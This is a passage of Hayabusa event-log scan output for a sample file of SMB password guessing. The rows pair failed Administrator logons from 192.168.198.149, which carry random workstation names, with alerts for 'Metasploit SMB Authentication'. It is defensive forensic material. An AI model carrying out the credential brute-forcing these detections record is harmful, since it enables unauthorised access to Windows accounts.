15422016-09-20 01:50:16.459 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15432016-09-20 01:50:16.459 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15442016-09-20 01:50:16.507 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15452016-09-20 01:50:16.507 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15462016-09-20 01:50:16.549 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15472016-09-20 01:50:16.549 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15482016-09-20 01:50:16.596 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15492016-09-20 01:50:16.596 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15502016-09-20 01:50:16.623 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15512016-09-20 01:50:16.623 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15522016-09-20 01:50:16.664 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15532016-09-20 01:50:16.664 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15542016-09-20 01:50:16.701 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15552016-09-20 01:50:16.701 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15562016-09-20 01:50:16.741 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15572016-09-20 01:50:16.741 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15582016-09-20 01:50:16.783 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15592016-09-20 01:50:16.783 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15602016-09-20 01:50:16.827 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15612016-09-20 01:50:16.827 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15622016-09-20 01:50:16.872 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15632016-09-20 01:50:16.872 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15642016-09-20 01:50:16.904 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15652016-09-20 01:50:16.904 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15662016-09-20 01:50:16.947 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15672016-09-20 01:50:16.947 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15682016-09-20 01:50:16.982 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15692016-09-20 01:50:16.982 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15702016-09-20 01:50:17.023 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15712016-09-20 01:50:17.023 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15722016-09-20 01:50:17.051 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15732016-09-20 01:50:17.051 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15742016-09-20 01:50:17.099 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15752016-09-20 01:50:17.099 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15762016-09-20 01:50:17.148 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15772016-09-20 01:50:17.148 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15782016-09-20 01:50:17.192 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15792016-09-20 01:50:17.192 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15802016-09-20 01:50:17.237 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15812016-09-20 01:50:17.237 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15822016-09-20 01:50:17.277 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15832016-09-20 01:50:17.277 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15842016-09-20 01:50:17.312 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15852016-09-20 01:50:17.312 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15862016-09-20 01:50:17.357 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15872016-09-20 01:50:17.357 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15882016-09-20 01:50:17.414 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15892016-09-20 01:50:17.414 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15902016-09-20 01:50:17.453 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15912016-09-20 01:50:17.453 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15922016-09-20 01:50:17.486 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15932016-09-20 01:50:17.486 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15942016-09-20 01:50:17.524 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15952016-09-20 01:50:17.524 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15962016-09-20 01:50:17.563 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15972016-09-20 01:50:17.563 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15982016-09-20 01:50:17.605 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
15992016-09-20 01:50:17.605 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16002016-09-20 01:50:17.648 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16012016-09-20 01:50:17.648 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16022016-09-20 01:50:17.692 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16032016-09-20 01:50:17.692 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16042016-09-20 01:50:17.728 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16052016-09-20 01:50:17.728 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16062016-09-20 01:50:17.866 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16072016-09-20 01:50:17.866 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16082016-09-20 01:50:17.921 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16092016-09-20 01:50:17.921 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16102016-09-20 01:50:17.965 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16112016-09-20 01:50:17.965 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16122016-09-20 01:50:18.009 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16132016-09-20 01:50:18.009 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16142016-09-20 01:50:18.051 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16152016-09-20 01:50:18.051 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16162016-09-20 01:50:18.093 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16172016-09-20 01:50:18.093 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16182016-09-20 01:50:18.128 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: NVDE3fIoUQfLn3cd : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16192016-09-20 01:50:18.128 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16202016-09-20 01:50:18.175 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: UlD48O0XpFUnuSmo : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16212016-09-20 01:50:18.175 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16222016-09-20 01:50:18.213 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: KyTPKuspADmLpv0L : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16232016-09-20 01:50:18.213 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16242016-09-20 01:50:18.260 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: BdIAPiH32ZbmCgTK : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16252016-09-20 01:50:18.260 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16262016-09-20 01:50:18.292 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 1dEiN2xOA4E9Wl5p : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16272016-09-20 01:50:18.292 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16282016-09-20 01:50:18.337 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: fBeAez2fLjXB0dk3 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16292016-09-20 01:50:18.337 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16302016-09-20 01:50:18.372 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: gQ45aeMDc3Snabvv : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16312016-09-20 01:50:18.372 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16322016-09-20 01:50:18.420 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: QWSYdr4lJlhCLMMW : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16332016-09-20 01:50:18.420 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16342016-09-20 01:50:18.462 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: RgxHY7072aUCdfa0 : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16352016-09-20 01:50:18.462 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16362016-09-20 01:50:18.504 +09:00DESKTOP-M5SN04R4625lowLogon Failure - Wrong PasswordUser: Administrator : Type: 3 : Workstation: 9yKhEodJDTVCGdIG : IP Address: 192.168.198.149 : AuthPackage: NTLMrules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
16372016-09-20 01:50:18.504 +09:00DESKTOP-M5SN04R4625highMetasploit SMB Authenticationrules/sigma/builtin/security/win_metasploit_authentication.yml../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
